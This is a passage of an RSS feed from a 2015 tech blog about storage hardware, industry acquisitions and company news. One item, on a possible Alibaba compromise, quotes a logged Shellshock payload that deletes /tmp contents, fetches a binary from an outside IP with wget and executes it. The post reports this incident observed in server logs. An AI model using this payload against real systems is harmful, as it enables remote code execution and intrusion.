      <link>https://blog.scalability.org/2015/08/rebuilding-our-kernel-build-system-for-fun-and-profit/</link>
      <pubDate>Wed, 05 Aug 2015 02:03:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/rebuilding-our-kernel-build-system-for-fun-and-profit/</guid>
      <description>No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn&amp;rsquo;t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.</description>
    </item>
    
    <item>
      <title>Drama at Violin Memory</title>
      <link>https://blog.scalability.org/2015/08/drama-at-violin-memory/</link>
      <pubDate>Tue, 04 Aug 2015 03:56:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/drama-at-violin-memory/</guid>
      <description>Violin has had a rather tumultuous time in market. Post IPO, they&amp;rsquo;ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can&amp;rsquo;t be a fun time for them. They don&amp;rsquo;t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets &amp;hellip; they will get slaughtered in the market.</description>
    </item>
    
    <item>
      <title>Scalable Informatics 13th year anniversary on Saturday</title>
      <link>https://blog.scalability.org/2015/07/scalable-informatics-13th-year-anniversary-on-saturday/</link>
      <pubDate>Thu, 30 Jul 2015 16:33:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/scalable-informatics-13th-year-anniversary-on-saturday/</guid>
      <description>We started the company on 1-August-2002. I remember arguing with a senior VP at SGI over his decision to abandon linux clusters in Feb 2001. That was the catalyst for me leaving SGI, but I was too chicken to start Scalable then. I thought I could do better than them. I went to another place for 15 months or so. Tried jumpstarting an HPC group there &amp;hellip; hired lots of folks, pursued lots of business.</description>
    </item>
    
    <item>
      <title>Been there, done that, even have a patent on it</title>
      <link>https://blog.scalability.org/2015/07/been-there-done-that-even-have-a-patent-on-it/</link>
      <pubDate>Thu, 30 Jul 2015 15:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/been-there-done-that-even-have-a-patent-on-it/</guid>
      <description>I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I&amp;rsquo;ve seen something like this before &amp;hellip; and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.</description>
    </item>
    
    <item>
      <title>Build debugging thoughts</title>
      <link>https://blog.scalability.org/2015/07/build-debugging-thoughts/</link>
      <pubDate>Thu, 30 Jul 2015 02:02:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/build-debugging-thoughts/</guid>
      <description>Our toolchain that we use for providing up to date and bug-reduced versions of various tools for our appliances have a number of internal testing suites. These suites do a pretty good job of exercising code. When you build Perl, and the internal modules and tools, tests are done right then and there, as part of the module installation. Sadly not many languages do this yet, I think Julia, R, and a few others might.</description>
    </item>
    
    <item>
      <title>Insanely awesome project and product</title>
      <link>https://blog.scalability.org/2015/07/insanely-awesome-project-and-product/</link>
      <pubDate>Tue, 28 Jul 2015 03:22:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/insanely-awesome-project-and-product/</guid>
      <description>This is one of Scalable Informatics FastPath Unison systems, well the bottom part. The top are clients we are using to test with.
[ ](/images/flashy.jpg)
Each of the servers at the bottom is a 4U with 54 physical 2.5 inch 6g/12g SAS or SATA SSDs. We have 5 of these units in the picture. And a number of SSDs on the way to fill them up. Think 0.2PB usable of flash.</description>
    </item>
    
    <item>
      <title>Playing &#34;guess which wire I just pulled&#34; isn&#39;t fun</title>
      <link>https://blog.scalability.org/2015/07/playing-guess-which-wire-i-just-pulled-isnt-fun/</link>
      <pubDate>Mon, 27 Jul 2015 21:51:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/playing-guess-which-wire-i-just-pulled-isnt-fun/</guid>
      <description>Even less fun when the boxes are half a world away. Yeah, this was my weekend and a large chunk of today. This will segue into another post on design and (unintended) changes in design, and end user expectations at some point. Its hard to maintain a concept of an SLO if some of the underlying technology you are relying upon to deliver these objectives (like, I dunno, a wire?), suddenly disappears on you.</description>
    </item>
    
    <item>
      <title>M&amp;A fallout:  Cisco may have ditched Invicta after buying Whiptail</title>
      <link>https://blog.scalability.org/2015/07/ma-fallout-cisco-may-have-ditched-invicta-after-buying-whiptail/</link>
      <pubDate>Fri, 24 Jul 2015 15:20:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/ma-fallout-cisco-may-have-ditched-invicta-after-buying-whiptail/</guid>
      <description>Article is here, take it as a rumor until we hear from them. My comments: First, M&amp;amp;A; is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and a culture/people fit matter. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn&amp;rsquo;t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.</description>
    </item>
    
    <item>
      <title>On storage unicorns and their likely survival or implosion</title>
      <link>https://blog.scalability.org/2015/07/on-storage-unicorns-and-their-likely-survival-or-implosion/</link>
      <pubDate>Fri, 24 Jul 2015 15:09:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/on-storage-unicorns-and-their-likely-survival-or-implosion/</guid>
      <description>The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy &amp;ldquo;standard&amp;rdquo; valuation norms, and hold onto their private status longer than those in the past. That is, they aren&amp;rsquo;t in a rush to IPO or get acquired.
The article goes on to analyze the &amp;ldquo;storage&amp;rdquo; unicorns, those in the &amp;ldquo;storage&amp;rdquo; field. They admix storage, nosql, hyperconverged, and storage as a service.</description>
    </item>
    
    <item>
      <title>Tools for linux devops: lsbond.pl</title>
      <link>https://blog.scalability.org/2015/07/tools-for-linux-devops-lsbonds-pl/</link>
      <pubDate>Tue, 21 Jul 2015 18:58:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/tools-for-linux-devops-lsbonds-pl/</guid>
      <description>Slowly and surely, I am scratching the itches I&amp;rsquo;ve had for a while with regards to data extraction from a running system. One of the big issues I deal with all the time is to extract what the state and components (and their states) of a linux network bond. Its an annoying combination of /sys/class/net, /proc/net/bonding/, and ethtool/ip commands. So I decided to simplify it.
bond0:	mac 00:11:22:33:44:55 state up mode load balancing (xor) xmit_hash layer2+3 (2) polling 100 ms up_delay 200 ms down_delay 200 ms ipv4 10.</description>
    </item>
    
    <item>
      <title>Day job growing</title>
      <link>https://blog.scalability.org/2015/07/day-job-growing/</link>
      <pubDate>Tue, 21 Jul 2015 03:05:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/day-job-growing/</guid>
      <description>We brought on a new business development and sales manager today. Actually based in Michigan. Looking forward to great things from him, and we are all pretty excited!</description>
    </item>
    
    <item>
      <title>Gmail lossy email system</title>
      <link>https://blog.scalability.org/2015/07/gmail-lossy-email-system/</link>
      <pubDate>Tue, 21 Jul 2015 03:03:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/gmail-lossy-email-system/</guid>
      <description>For months I&amp;rsquo;ve been noting that email to my 2 different GMail accounts (one for work on the business side using the Google Apps for business, and yes, paid for &amp;hellip; and one for personal) are not getting all the emails sent to it. I&amp;rsquo;ve had customers reach out to me here at this site, as well as calling me up to ask me if I&amp;rsquo;ve been getting their email. Seems I&amp;rsquo;m not the only one, though the complaint here appears to be a bad filter and characterizing system.</description>
    </item>
    
    <item>
      <title>Baidu attack deflection</title>
      <link>https://blog.scalability.org/2015/07/baidu-attack-deflection/</link>
      <pubDate>Thu, 16 Jul 2015 04:48:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/baidu-attack-deflection/</guid>
      <description>So Baidu&amp;rsquo;s web crawler is broken. Makes the bad old days of bing bot look positively benign. Wasn&amp;rsquo;t pushing much load, but lots of log spam and it showed signs of increasing over time. So, out comes the ban hammer. Then I thought, why not report their broken bot to them. Should be as simple as an email, or a web page. Sure enough, they have links for filling out forms to indicate that their web crawler is going crazy.</description>
    </item>
    
    <item>
      <title>M&amp;A or more correctly, acqui-hire:  Cray bags much of Terascala</title>
      <link>https://blog.scalability.org/2015/07/ma-or-more-correctly-acqui-hire-cray-bags-much-of-terascala/</link>
      <pubDate>Wed, 15 Jul 2015 14:28:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/ma-or-more-correctly-acqui-hire-cray-bags-much-of-terascala/</guid>
      <description>Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation &amp;hellip; unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.</description>
    </item>
    
    <item>
      <title>Potential M&amp;A:  Micron being pursued</title>
      <link>https://blog.scalability.org/2015/07/potential-ma-micron-being-pursued/</link>
      <pubDate>Wed, 15 Jul 2015 14:10:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/potential-ma-micron-being-pursued/</guid>
      <description>I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.</description>
    </item>
    
    <item>
      <title>Fixing Baidu&#39;s broken search bot</title>
      <link>https://blog.scalability.org/2015/07/fixing-baidus-broken-search-bot/</link>
      <pubDate>Wed, 15 Jul 2015 01:44:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/fixing-baidus-broken-search-bot/</guid>
      <description>It seems that the bot was generating some effectively random broken URLs. Or maybe not so random. I saw endpoints in the logs that haven&amp;rsquo;t been in use for at least 7 years. I can&amp;rsquo;t imagine this was simply a harmless bug, as much as &amp;hellip; maybe? &amp;hellip; a search for moved/renamed endpoints? As the web server is now done very differently than in the past, the missing endpoints merely generated log spam.</description>
    </item>
    
    <item>
      <title>Blog post title of the day ... Any Sufficiently Advanced Technology ...</title>
      <link>https://blog.scalability.org/2015/07/blog-post-title-of-the-day-any-sufficiently-advanced-technology/</link>
      <pubDate>Tue, 14 Jul 2015 14:42:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/blog-post-title-of-the-day-any-sufficiently-advanced-technology/</guid>
      <description>I am a huge fan of Charles Stross&amp;rsquo;s (@cstross) Laundry series (and most of what he writes in general), and just finished his latest over the weekend. Up on his blog, he had a guest author write a post while he was stuck in traffic or similar. The title of the entry wins the internets today.
Yup, definitely a winner &amp;hellip;</description>
    </item>
    
    <item>
      <title>Most of our traffic on the day job site now comes from Baidu</title>
      <link>https://blog.scalability.org/2015/07/most-of-our-traffic-on-the-day-job-site-now-comes-from-baidu/</link>
      <pubDate>Mon, 13 Jul 2015 16:26:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/most-of-our-traffic-on-the-day-job-site-now-comes-from-baidu/</guid>
      <description>Well, their web crawler. Way way back in the day, I complained about broken bing-bots. This was 8 years ago. Bing was fairly crappy at crawling, and seems to have improved. Google is still the lightest touch. Least impactful. Deeply in the traffic noise. Not Baidu. There bot is, for lack of a better term, broken. Its not into DoS levels, but it is wasting traffic/resources, and providing lots of log spam.</description>
    </item>
    
    <item>
      <title>Imitation and repetition is a sincere form of flattery</title>
      <link>https://blog.scalability.org/2015/07/imitation-and-repetition-is-a-sincere-form-of-flattery/</link>
      <pubDate>Fri, 10 Jul 2015 15:28:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/imitation-and-repetition-is-a-sincere-form-of-flattery/</guid>
      <description>A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.</description>
    </item>
    
    <item>
      <title>Portable PetaByte systems update</title>
      <link>https://blog.scalability.org/2015/07/portable-petabyte-systems-update/</link>
      <pubDate>Fri, 10 Jul 2015 14:57:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/portable-petabyte-systems-update/</guid>
      <description>As a reminder, the day job has 1PB dense and fast (20GB/s and above)storage systems available for about $0.25/GB fully supported, delivered, and installed. All you need to provide is power and a network connection. I should note that we&amp;rsquo;ve delivered all flash versions of these as well as hybrid versions for various use cases. We will have an update on these leveraging our greater density options, including 2.3PB/rack fully supported for 3 years, with shipping and installation for under $600k USD, as well as a 1PB flash version in 1-2 racks.</description>
    </item>
    
    <item>
      <title>takes a licking and keeps on ticking</title>
      <link>https://blog.scalability.org/2015/07/takes-a-licking-and-keeps-on-ticking/</link>
      <pubDate>Mon, 06 Jul 2015 20:11:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/takes-a-licking-and-keeps-on-ticking/</guid>
      <description>One of our systems at a customer site.
$ uptime 15:47:33 up 407 days, 3:23, 2 users, load average: 0.19, 0.10, 0.06 $ uname -r 3.10.36.scalable  </description>
    </item>
    
    <item>
      <title>A new thing to occupy my time</title>
      <link>https://blog.scalability.org/2015/07/a-new-thing-to-occupy-my-time/</link>
      <pubDate>Sat, 04 Jul 2015 02:35:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/a-new-thing-to-occupy-my-time/</guid>
      <description>Doesn&amp;rsquo;t have to be a code golf mechanism, but this looks like fun!</description>
    </item>
    
    <item>
      <title>Thoughts on a Thursday</title>
      <link>https://blog.scalability.org/2015/06/thoughts-on-a-thursday/</link>
      <pubDate>Thu, 25 Jun 2015 22:05:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/thoughts-on-a-thursday/</guid>
      <description>We&amp;rsquo;ve been doing the startup thing for a hair under 13 years now. Most of the time we&amp;rsquo;ve been self funded, and recently we took a small investment in a friends and family round (angel.co link here). What occurs to me, after we soft announced our 100GbE results via a Mellanox PR today, is that we&amp;rsquo;ve been building the types of high performance platforms that enable end users to do bigger and better things for the whole time.</description>
    </item>
    
    <item>
      <title>Interesting conversation with a customer about our siRouter</title>
      <link>https://blog.scalability.org/2015/06/interesting-conversation-with-a-customer-about-our-sirouter/</link>
      <pubDate>Thu, 25 Jun 2015 21:50:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/interesting-conversation-with-a-customer-about-our-sirouter/</guid>
      <description>They are turning their SDN concept into one of the most incredible technologies around, a tremendous competitive advantage for them over others in their space. I had been under the impression that they were running everything on their (quite awesome) 10/40GbE switches. These are SDN capable switches from a very well funded SDN switch startup. Turns out, their SDN stack is actually running on siRouter. They are doing some very cool bits on the software stack side, and getting about 2 microseconds port to port.</description>
    </item>
    
    <item>
      <title>Our 100GbE flash storage appliance benchmarks discussed</title>
      <link>https://blog.scalability.org/2015/06/our-100gbe-flash-storage-appliance-benchmarks-discussed/</link>
      <pubDate>Thu, 25 Jun 2015 19:56:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/our-100gbe-flash-storage-appliance-benchmarks-discussed/</guid>
      <description>See the PR bit here (http://www.hpcwire.com/off-the-wire/new-mellanox-performance-benchmarks-released/ for the link impaired) This is a Unison Ceph appliance ( http://scalableinformatics.com/unison ) and they are available and shipping now. Please reach out to us if you&amp;rsquo;d like to discuss. And yes, this is the world&amp;rsquo;s first 100GbE storage appliance, or storage server SAN device if you prefer. Easily one of the fastest systems in market. [Update] Forgot to mention, this is a set of units bought by a customer, and at their site.</description>
    </item>
    
    <item>
      <title>Day job is hiring</title>
      <link>https://blog.scalability.org/2015/06/day-job-is-hiring/</link>
      <pubDate>Fri, 19 Jun 2015 03:24:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/day-job-is-hiring/</guid>
      <description>Business development/sales role for now. See here (url: https://scalableinformatics.com/bus-dev in case you don&amp;rsquo;t see the link) for more details. Prefer New York, Chicago, Boston, or nearby. No relocation.</description>
    </item>
    
    <item>
      <title>SIOS v2.0 running pxe booted</title>
      <link>https://blog.scalability.org/2015/06/sios-v2-0-running-pxe-booted/</link>
      <pubDate>Thu, 18 Jun 2015 19:59:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/sios-v2-0-running-pxe-booted/</guid>
      <description>Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. Its been cooking in the background for a while, for, as you might have noticed from my posting frequency, I&amp;rsquo;ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h Filesystem Size Used Avail Use% Mounted on tmpfs 8.</description>
    </item>
    
    <item>
      <title>Off to Chicago for The Trading Show</title>
      <link>https://blog.scalability.org/2015/06/off-to-chicago-for-the-trading-show/</link>
      <pubDate>Mon, 01 Jun 2015 14:41:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/off-to-chicago-for-the-trading-show/</guid>
      <description>Looking forward to our booth #243 at the Trading Show in Chicago. We&amp;rsquo;ll have a FastPath Cadence time series analytics unit with us. Should be fun!</description>
    </item>
    
    <item>
      <title>M&amp;A:  Avago grabbed Broadcom, Intel grabs Altera</title>
      <link>https://blog.scalability.org/2015/06/ma-avago-grabbed-broadcom-intel-grabs-altera/</link>
      <pubDate>Mon, 01 Jun 2015 14:39:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/ma-avago-grabbed-broadcom-intel-grabs-altera/</guid>
      <description>Avago continues its acquisition spree. Broadcom (network chipsets and NPUs, CPUs, etc.). This is looking like a more integrated semiconductor IP play here. They grabbed LSI, and shed the non-chippery bits. They grabbed PLX. And Emulex. As they say, curiouser and curiouser. This makes perfect sense to me, and given the other acquisition announced today, I am going to bet they will be talking (at least) to Xilinx. And then there&amp;rsquo;s Intel.</description>
    </item>
    
    <item>
      <title>M&amp;A [RUMOR]:  Cisco grabs Nutanix</title>
      <link>https://blog.scalability.org/2015/05/ma-cisco-grabs-nutanix/</link>
      <pubDate>Fri, 15 May 2015 14:48:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/ma-cisco-grabs-nutanix/</guid>
      <description>[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix&amp;rsquo;s web site. Its April fools, in May. /sigh
 Huge in the hyperconverged space (which, not so curiously, is where the day job is), and its setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about &amp;ldquo;beating the white boxes&amp;rdquo;. The last may be more wishful thinking than reality.</description>
    </item>
    
    <item>
      <title>Massive, Unapologetic Firepower: part 3, the network</title>
      <link>https://blog.scalability.org/2015/05/massive-unapologetic-firepower-part-3-the-network/</link>
      <pubDate>Mon, 04 May 2015 21:54:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/massive-unapologetic-firepower-part-3-the-network/</guid>
      <description>Take the worlds fastest hyperconverged storage-compute server. Mix into this the worlds fastest networking. What do you get? (hint: something you can order today)
~# iperf -c 192.168.1.1 -l128k -w 512k -P10 -t 4 ------------------------------------------------------------ Client connecting to 192.168.1.1, TCP port 5001 TCP window size: 1.00 MByte (WARNING: requested 512 KByte) ------------------------------------------------------------ [ 11] local 192.168.1.2 port 50804 connected with 192.168.1.1 port 5001 [ 4] local 192.168.1.2 port 50796 connected with 192.</description>
    </item>
    
    <item>
      <title>Thoughts after a small capital raise</title>
      <link>https://blog.scalability.org/2015/05/thoughts-after-a-small-capital-raise/</link>
      <pubDate>Mon, 04 May 2015 21:45:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/thoughts-after-a-small-capital-raise/</guid>
      <description>So the day job did a small capital raise. Not a huge amount, but helpful for some day to day stuff. We did this in part because a larger effort we were working on stalled for reasons I won&amp;rsquo;t go into here. Looking at where we are and where we need to be, I am amazed at the profound need for performance throughout the hyperconverged space, and blown away that we appear to be the only one focused upon it.</description>
    </item>
    
    <item>
      <title>diagnostics</title>
      <link>https://blog.scalability.org/2015/05/diagnostics/</link>
      <pubDate>Mon, 04 May 2015 13:31:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/diagnostics/</guid>
      <description>This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there, whom think they know something of hardware/software/system level diagnostics and problem identification (from newbie to &amp;ldquo;veteran&amp;rdquo;) are either full of it, or really clueless.</description>
    </item>
    
    <item>
      <title>Been heads down working very hard on something very cool</title>
      <link>https://blog.scalability.org/2015/04/been-heads-down-working-very-hard-on-something-very-cool/</link>
      <pubDate>Thu, 30 Apr 2015 21:58:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/been-heads-down-working-very-hard-on-something-very-cool/</guid>
      <description>More soon. We&amp;rsquo;ll post here, with some basic results. Insanely cool stuff.</description>
    </item>
    
    <item>
      <title>Booth at BioIT World 15 in Boston</title>
      <link>https://blog.scalability.org/2015/04/booth-at-bioit-world-15-in-boston/</link>
      <pubDate>Tue, 21 Apr 2015 11:03:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/booth-at-bioit-world-15-in-boston/</guid>
      <description>Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)</description>
    </item>
    
    <item>
      <title>theme updated</title>
      <link>https://blog.scalability.org/2015/04/theme-updated/</link>
      <pubDate>Tue, 21 Apr 2015 00:36:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/theme-updated/</guid>
      <description>&amp;hellip; so we don&amp;rsquo;t get lost in the mobile-geddon changes.</description>
    </item>
    
    <item>
      <title>Nebula shuts down</title>
      <link>https://blog.scalability.org/2015/04/nebula-shuts-down/</link>
      <pubDate>Wed, 01 Apr 2015 23:10:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/nebula-shuts-down/</guid>
      <description>Nebula, a cloud &amp;ldquo;appliance&amp;rdquo; (and company) has shut down. The software is open source, so their customers can pay others to provide support, or migrate to another stack. This isn&amp;rsquo;t a public cloud company, rather a private cloud company. There is little operational risk in moving from one openstack build to another. Feel free to reach out to me (landman @ scalability.org) privately if you need to speak to someone about this.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Convey snapped up by Micron</title>
      <link>https://blog.scalability.org/2015/04/ma-convey-snapped-up-by-micron/</link>
      <pubDate>Wed, 01 Apr 2015 18:36:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/ma-convey-snapped-up-by-micron/</guid>
      <description>Rich at InsideHPC has the story. There is a good fit for Micron, as they are rapidly turning into one of the stronger players in the space. As I had noted, the storage OEMs are either buying into vertical integration or partnering to make it happen. Convey is actually a natural fit given other of Micron&amp;rsquo;s projects. The big question is, for the OEMs not going this route, or waiting to go this route, will that strategy work?</description>
    </item>
    
    <item>
      <title>Announcement of new storage appliance</title>
      <link>https://blog.scalability.org/2015/04/announcement-of-new-storage-appliance/</link>
      <pubDate>Wed, 01 Apr 2015 05:01:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/announcement-of-new-storage-appliance/</guid>
      <description>More information in our video (linked here in case the video doesn&amp;rsquo;t embed properly, you may need to enable flash and scripting on the page to see it embed*). Also, check out the page at the day job:
 we don&amp;rsquo;t do google or other analytics (just local stuff here), so this shouldn&amp;rsquo;t be a security issue. Let us know if you believe otherwise.  </description>
    </item>
    
    <item>
      <title>M&amp;A:  Blekko grabbed by IBM for Watson</title>
      <link>https://blog.scalability.org/2015/03/ma-blekko-grabbed-by-ibm-for-watson/</link>
      <pubDate>Sun, 29 Mar 2015 22:52:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/ma-blekko-grabbed-by-ibm-for-watson/</guid>
      <description>Have a look at the page. Blekko was started by a number of people including Greg Lindahl having spent many years in the HPC world. He&amp;rsquo;s another recovering physical scientist (astronomer as I remember). This is interesting as it gives a sense as to where IBM sees its future. They aren&amp;rsquo;t (it looks like to me) trying to compete with google, rather, trying to add interesting capability to Watson. They see Watson and things derived from it as their future.</description>
    </item>
    
    <item>
      <title>The worlds fastest hyper-converged appliance is faster and more affordable than ever</title>
      <link>https://blog.scalability.org/2015/03/the-worlds-fastest-hyper-converged-appliance-is-faster-and-more-affordable-than-ever/</link>
      <pubDate>Mon, 16 Mar 2015 16:13:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/the-worlds-fastest-hyper-converged-appliance-is-faster-and-more-affordable-than-ever/</guid>
      <description>This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint &amp;hellip; both rack based and cost wise &amp;hellip; as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.</description>
    </item>
    
    <item>
      <title>Interesting Q1 so far for day job</title>
      <link>https://blog.scalability.org/2015/03/interesting-q1-so-far-for-day-job/</link>
      <pubDate>Sat, 14 Mar 2015 14:29:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/interesting-q1-so-far-for-day-job/</guid>
      <description>Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I&amp;rsquo;d backed off posting intensity over the last half year or so while this was going on.</description>
    </item>
    
    <item>
      <title>Π day has come</title>
      <link>https://blog.scalability.org/2015/03/day-has-come/</link>
      <pubDate>Sat, 14 Mar 2015 14:10:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/day-has-come/</guid>
      <description>I like Π &amp;hellip; apple, cherry, etc. For those whom don&amp;rsquo;t get the pun, dates in the US are often written as Month/Day/Year, with year being abbreviated by 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined to be the ratio of circumference to diameter of circle on a 2D plane. You can extend the pun, by noting at 9:26.</description>
    </item>
    
    <item>
      <title>Has Alibaba been compromised?</title>
      <link>https://blog.scalability.org/2015/03/has-alibaba-been-compromised/</link>
      <pubDate>Wed, 11 Mar 2015 23:59:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/has-alibaba-been-compromised/</guid>
      <description>I saw this attack in the day job&amp;rsquo;s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn&amp;rsquo;t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22  This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that &amp;hellip; I&amp;rsquo;ll wait.</description>
    </item>
    
    <item>
      <title>A completely unsolved problem</title>
      <link>https://blog.scalability.org/2015/03/a-completely-unsolved-problem/</link>
      <pubDate>Mon, 09 Mar 2015 18:08:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/a-completely-unsolved-problem/</guid>
      <description>contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc. Except they are all broken. And not a little bit. I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I&amp;rsquo;ve had this list sync back and forth to Gmail via google. And it used to work. Then iPhone5 and well, ya know, it broke.</description>
    </item>
    
    <item>
      <title>Scalable Informatics customer Milford Film and Animation does awesome projects</title>
      <link>https://blog.scalability.org/2015/03/scalable-informatics-customer-milford-film-and-animation-does-awesome-projects/</link>
      <pubDate>Fri, 06 Mar 2015 16:43:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/scalable-informatics-customer-milford-film-and-animation-does-awesome-projects/</guid>
      <description>Its nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts. Their systems are very computationally, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package.</description>
    </item>
    
    <item>
      <title>My vote for most awesome Mac OSX software</title>
      <link>https://blog.scalability.org/2015/03/my-vote-for-most-awesome-mac-osx-software/</link>
      <pubDate>Wed, 04 Mar 2015 21:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/my-vote-for-most-awesome-mac-osx-software/</guid>
